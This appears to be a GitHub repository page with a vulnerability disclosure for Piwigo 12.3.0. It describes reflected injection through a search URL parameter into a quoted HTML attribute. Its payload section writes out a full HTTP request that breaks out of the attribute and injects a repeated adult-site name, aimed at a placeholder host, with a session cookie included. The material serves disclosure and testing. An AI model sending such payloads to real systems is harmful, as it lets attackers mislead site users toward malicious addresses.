Skip to content

Latest commit

 

History

History

12.3.0

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Docs
Docs
 
 
PoC
PoC
 
 
README.MD
README.MD
 
 

README.MD

Piwigo-12.3.0

Description:

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

Status: Highly Vulnerable

[+] Payloads:

GET /piwigo/index.php?/search/4863/created-monthly-list%22%3Ehttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned_host.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg_id=hctfqtab45adhogo2suhq2mr0c; ssc_phoneSwap=0
Upgrade-Insecure-Requests: 1

Reflected Out:

PoC

      • Link

Reproduce:

href

Proof and Exploit:

href